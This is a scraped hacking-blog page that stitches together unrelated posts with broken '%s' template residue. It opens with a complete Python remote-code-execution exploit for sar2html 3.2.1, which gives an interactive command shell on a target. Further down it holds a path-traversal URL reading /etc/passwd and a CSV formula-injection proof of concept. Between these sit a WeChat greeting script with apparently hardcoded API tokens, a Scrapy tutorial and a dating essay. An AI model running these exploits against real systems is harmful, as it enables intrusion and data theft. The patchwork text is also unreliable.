# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
prompt = "Command => "
def default(self, args):
exploiter(args)
def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}")
try:
out = re.findall("<option value=(.*?)>", output.text)
except:
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()
if __name__ == ("__main__"):
terminal = Terminal()
terminal.cmdloop()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863589593
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Date: Fri, 11 Dec 2020
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598
http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
# Exploit Title: Knockpy 4.1.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2020-12-29
# Vendor Homepage: https://github.com/guelfoweb/knock
# Version : 4.1.1
# Tested on: Debian 9.13
Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc.
The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered.
Vulnerable code segment(s)
# knockpy.py
# row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)
# subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))
# modules/save_report.py
# if fields:
# csv_report += 'ip,status,type,domain_name,server\n'
# for item in report:
# csv_report += item + '\n'
# report = csv_report
1. Example malicious Nginx config to return CSV formula headers:
http {
...
server_tokens off;
more_set_headers 'Server: =1336+1';
...
}
2. Tester runs Knoockpy
root@host:~/# python knockpy/knockpy.py -c test.local
+ checking for virustotal subdomains: SKIP
VirusTotal API_KEY not found
+ checking for wildcard: NO
+ checking for zonetransfer: NO
+ resolving target: YES
- scanning for subdomain...
Ip Address Status Type Domain Name Server
---------- ------ ---- ----------- ------
127.0.0.1 200 host appserver.test.local =1336+1
CSV result
root@host:~/# cat test_local.csv
127.0.0.1,200,host,appserver.test.local,=1336+1
127.0.0.1,200,host,www.test.local,=1336+1
We often use QQ email or 163 email for email. This is not tall enough in the contact information, and it is not full enough to show off. In order to introduce how to build your own domain name email address, let the glory of pretending illuminate the Internet!
Preparation
Activate Tencent Enterprise Email Service's own domain name
Activate Tencent Enterprise Email Service
Enter Tencent Enterprise Email Official Website and click Register.
Fill in the information to register the company WeChat account. You can fill in any part of the information, because it does not require review. At the same time, you need to bind a WeChat account as the administrator.
Bind your own domain name
Domain name resolution 
Effect 
Experience
Subrion CMS 4.2.1 - 'avatar[path]' XSS
HACKER · %s · %s
- Read more...
- 0 comments
- 9 views
- Read more...
- 0 comments
- 11 views
Click2Magic 1.1.5 - Stored Cross-Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
- Read more...
- 0 comments
- 10 views
Responsive E-Learning System 1.0 - 'id' Sql Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
- Read more...
- 0 comments
- 10 views
Responsive FileManager 9.13.4 - 'path' Path Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
Cassandra Web 0.5.0 - Remote File Read
HACKER · %s · %s
- Read more...
- 0 comments
- 9 views
- Read more...
- 0 comments
- 10 views
Online Learning Management System 1.0 - RCE (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 9 views
Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
Title: What to do if your girlfriend gets angry?
HACKER · %s · %s
Configuration
First visit the following connection and use your WeChat to scan the QR code to authorize login! https://mp.weixin.qq.com/debug/cgi-bin/sandbox?t=sandbox/login
Record the obtained app ID and appsecret value!
Then flip down and add a new test template.
Add template title and template content
{{first.DATA}}
Today's weather: {{keyword1.DATA}}
Today's temperature: {{keyword2.DATA}}
We are already in love: {{keyword3.DATA}}
There is still {{keyword4.DATA}}
{{remark.DATA}}
After the addition is complete, record the template ID
Then ask your girlfriend to follow the test official account, get the WeChat account and record it.
Get the weather interface
Visit the following link http://www.tianqiapi.com/
Register and log in, get the appid and appsecret and record, and test the weather information of the local city.
The API interface is as follows:
https://www.yiketianqi.com/free/day?appid=your idappsecret=your value unescape=1city=%E5%85%B0%E5%B7%9E
Get sweet talk interface
Visit www.alapi.cn, register and log in. Get the token and record it.
The API interface is as follows:
https://v2.alapi.cn/api/qinghua?token=Your value
Configure PHP
?php
$appId='1'; //Comply your own appId
$appSecret='2'; //Comply with your own appSecret
$wxgzhurl='https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credentialappid=' . $appId . 'secret=' . $appSecret;
$access_token_Arr=https_request($wxgzhurl);
$access_token=json_decode($access_token_Arr, true);
$ACCESS_TOKEN=$access_token['access_token']; //ACCESS_TOKEN
//When will you fall in love (don't make the format wrong)
$lovestart=strtotime('2022-08-01');
$end=time();
$love=ceil(($end - $lovestart)/86400);
//Which day is the next birthday (don't make the wrong format)
$birthdaystart=strtotime('2023-01-25');
$end=time();
$diff_days=($birthdaystart - $end);
$birthday=(int)($diff_days/86400);
$birthday=str_replace('-', '', $birthday);
$tianqiurl='https://www.yiketianqi.com/free/day?appid=95943915appsecret=5KNSKu9yunescape=1city=Wuhan'; //Modify it to your own
$tianqiapi=https_request($tianqiurl);
$tianqi=json_decode($tianqiapi, true);
$qinghuaqiurl='https://v2.alapi.cn/api/qinghua?token=BFlSa9Ny7qTZHwYk'; //Modify it to your own
$qinghuaapi=https_request($qinghuaqiurl);
$qinghua=json_decode($qinghuaapi, true);
//A word from you
$yjh=''; //You can leave it blank or write a previous sentence
$touser='oOBhas1F-h6rP9DxsTZGCP7xgjeQ'; //Fill in your girlfriend's openid
$data=array(
'touser'=$touser,
'template_id'='ujSRYGrQep4A8o0JCyW4pdy5cZ0YXrT6QXwMZC5tAf1111111111111110', //Change it to your own template id and view it in the WeChat background template message
'data'=array(
'first'=array(
'value'='$yjh',
'color'='#000'
),
'keyword1'=array(
'value'=$tianqi['wea'],
'color'='#000'
),
'keyword2'=array(
'value'=$tianqi['tem_day'],
'color'='#000'
),
'keyword3'=array(
'value'=$love . 'day',
'color'='#000'
),
'keyword4'=array(
'value'=$birthday . 'day',
'color'='#000'
),
'remark'=array(
'value'=$qinghua['data']['content'],
'color'='#f00'
),
)
);
//There is no need to move the following ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
$json_data=json_encode($data);
$url='https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=' . $ACCESS_TOKEN;
$res=https_request($url, urldecode($json_data));
$res=json_decode($res, true);
if ($res['errcode']==0 $res['errcode']=='ok') {
echo 'Send successfully! br/';
}else {
echo 'Send failed! Please check the code! br/';
}
function https_request($url, $data=null)
{
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
if (!empty($data)) {
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
}
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$output=curl_exec($curl);
curl_close($curl);
return $output;
}
After modifying the php file, upload it to the local server or remote server to test the link! If the prompt is sent successfully, the configuration will be completed!
Add a timed task
If you want your girlfriend to wake up in the morning, the first message you receive is a greeting from you. You must set up a scheduled task.
The command is as follows:
00 08 * * * /usr/bin/curl https://bbskali.cn/love.php that is 8:00 visits every day https://bbskali.cn/love.php
This is done, and your daily care for your girlfriend!
Effect
- Read more...
- 0 comments
- 10 views
IncomCMS 2.0 - Insecure File Upload
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
Arteco Web Client DVR/NVR - 'SessionId' Brute Force
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
Title: Getting Started with Scrapy Crawler
HACKER · %s · %s
Installation
In kali, because the python environment has been installed, we can directly install it with the following command.
pip install Scrapy
Isn't the installation very easy?
Now we will demonstrate how to crawl through the official small demo.
Save the following file as a 22.py file
import scrapy
class QuotesSpider(scrapy.Spider):
name='quotes'
start_urls=[
'https://quotes.toscrape.com/tag/humor/',
]
def parse(self, response):
for quote in response.css('div.quote'):
yield {
'author': quote.xpath('span/small/text()').get(),
'text': quote.css('span.text:text').get(),
}
next_page=response.css('li.next a:attr('href')').get()
if next_page is not None:
yield response.follow(next_page, self.parse) execute the following command
scrapy runspider 22.py -o quotes.jl crawler results will be saved to quotes.jl file. Save data format as json.
Crawler results
Code Analysis
Now we analyze the code
First, let’s take a look at the demo page provided by the official
The code for this is as follows
div class='quote' itemscope='' itemtype='http://schema.org/CreativeWork'
span class='text' itemprop='text'"The world as we have created it is a process of our thinking. It cannot be changed without changing our thinking."/span
spanby small class='author' itemprop='author'Albert Einstein/small
a href='/author/Albert-Einstein'(about)/a
/span
div class='tags'
Tags:
meta class='keywords' itemprop='keywords' content='change,deep-thoughts,thinking,world'
a class='tag' href='/tag/change/page/1/'change/a
a class='tag' href='/tag/deep-thoughts/page/1/'deep-thoughts/a
a class='tag' href='/tag/thinking/page/1/'thinking/a
a class='tag' href='/tag/world/page/1/'world/a
/div
/div Now we analyze the crawler code
#Import the crawler module
import scrapy
class QuotesSpider(scrapy.Spider):
#Define two variables name and start_urls. Among them, start_urls is the target website of the crawler.
name='quotes'
start_urls=[
'https://quotes.toscrape.com/',
]
def parse(self, response):
#Travel over elements that use css as quote
for quote in response.css('div.quote'):
# Generate a dictionary containing the extracted quote text and author
#Get the values of author and text under DIV
yield {
'author': quote.xpath('span/small/text()').get(),
'text': quote.css('span.text:text').get(),
}
#Find links to the next page
next_page=response.css('li.next a:attr('href')').get()
if next_page is not None:
yield response.follow(next_page, self.parse)
quote.xpath('span/small/text()') Deep traversal to obtain the span tag under the target div, the small tag under the span tag, and pass in text (). Use the get() function to get its text value
The DIV is as follows
spanby small class='author' itemprop='author'Albert Einstein/smallquote.css('span.text:text').get(), get the value of the css under the span element under the css as the text element.
The DIV for this is as follows:
span class='text' itemprop='text'"The world as we have created it is a process of our thinking. It cannot be changed without changing our thinking."/span Similarly, we can write out the value of the get tag tag.
div class='tags'
a class='tag' href='/tag/humor/page/1/'humor/a
/div'tags': quote.css('a.tag:text').getall() Here getall is to get all.
The slight test
Here we crawl the member rankings in the Big Cousin forum as an example
import scrapy
class QuotesSpider(scrapy.Spider):
name='quotes'
start_urls=[
'https://bbskali.cn/portal.php',
]
def parse(self, response):
for quote in response.css('div.z'):
yield {
'z': quote.xpath('p/a/text()').get(),
'z1': quote.css('p:text').get(),
}
next_page=response.css('li.next a:attr('href')').get()
if next_page is not None:
yield response.follow(next_page, self.parse)
How about it, it’s simple!
- Read more...
- 0 comments
- 10 views
WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
Online Movie Streaming 1.0 - Authentication Bypass
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
Baby Care System 1.0 - 'Post title' Stored XSS
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views
- Read more...
- 0 comments
- 10 views
Title: Will a hacker have a girlfriend?
HACKER · %s · %s
First of all, this article does not apply to the second generation of official and rich second generation. If you are, please ignore this article.
Before the screen, you are also in your youth in your youth and in your struggle. As a veteran, my cousin told me about his views on the things around him. My cousin, I live in a small county town in the northwest, living a five-to-nine-year-old work life. After working, I shared some knowledge about network security and met many friends who like network security. Then many friends asked me, is there a fortune in cybersecurity? Will there be a girlfriend?
I'll tell you the answer here
Money==Having a girlfriend==Having a wife
Yes, my answer may make you feel uncomfortable. Will you still have feelings? So what can you do in the face of reality today?
Just about the matter around my cousin, several of my friends are almost 30 years old and are at the age of discussing marriage. After a few girlfriends on blind dates, they ended up having a bad time. It's nothing more than a woman asking for a car or a house. In fact, in my opinion, it is not that the woman is too realistic, but that society has reached this point, just like we cannot do without smartphones. Besides, if you marry your daughter, would you compromise with reality?
Actually, in my opinion. The ultimate main problem is the work problem! Maybe you will say, I am a programmer, I am a big black man. I earn 400,000 yuan per month, so I tell you that in the eyes of adults, awesome programmers are just computer repairs. In the eyes of parents, civil servants (staffing) government departments have stable jobs (teachers, doctors) company bosses work and unemployed vagrants (big Heikuo)
So the end of the work is the establishment, especially in the context of the epidemic. Is the establishment not popular?
Even a senior programmer can make a living from youth. After the age of 40, you will either be promoted to management or change careers.
After talking about the work, let’s talk about housing prices!
Regarding housing prices, I dare not talk too much about my opinion. Because I am also a person in the bureau, I don’t know which year or month it will end every month. Take our small county town as an example, the average house price is 5,500-6,300/square meter. I dare not mention the housing prices in Beijing, Shanghai and Guangzhou. If it is a 100 square meter apartment, the bare house price alone will cost about 60,000 yuan. Loans based on 0.25% of the housing provident fund. Pay a down payment of 200,000 yuan and a loan of 400 yuan. The loan will be 100,000 yuan in interest for 15 years. The decoration is calculated at 150,000 yuan, which means that if you find a girlfriend to get married, the house will cost (200,000 yuan down payment + 150 yuan decoration) to solve the problem of the wedding house. Leave the rest to time to digest.
Let's talk about the bride price after talking about the housing price
Borrow gifts are inevitable for every big black man who talks about marriage. The dowry varies from person to person depending on the region, the degree of education of parents, and different places. The big cousin's bride price is 8.8w-40w from town to rural areas. This is also a lot of money for ordinary families.
As for the car, everyone knows it well, so I won’t mention it here.
Of course, for the premise of the above mentioned things, you must have a girlfriend who can talk about marriage. As a big heikuo, you don’t even have a girlfriend, so don’t mention the above.
The main reasons are as follows:
A lot of time spent finding loopholes. I have been with computers and mobile phones for a long time and lacked communication, especially with the opposite sex. Long-term viewing of computers and mobile phones can cause baldness and high myopia of eyes. He does not pay attention to appearance, does not shave his beard, and wears the same clothes for three years. When I have money, I only know how to buy a 3090Ti graphics card, but I don’t know how to spend money to buy gifts. Being with computers for a long time will lead to a withdrawn and introverted personality. To sum up, become a big black man. I want to find a sexy and beautiful girlfriend as my wife. It can be said that it is even more difficult. Unless the family conditions are very good, that is, either the second generation of officials or the second generation of rich people, you can consider it carefully. Otherwise, my cousin will advise you that network security can only be regarded as an interest in learning and research, and it cannot be used as a main business.
- Read more...
- 0 comments
- 10 views
CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 10 views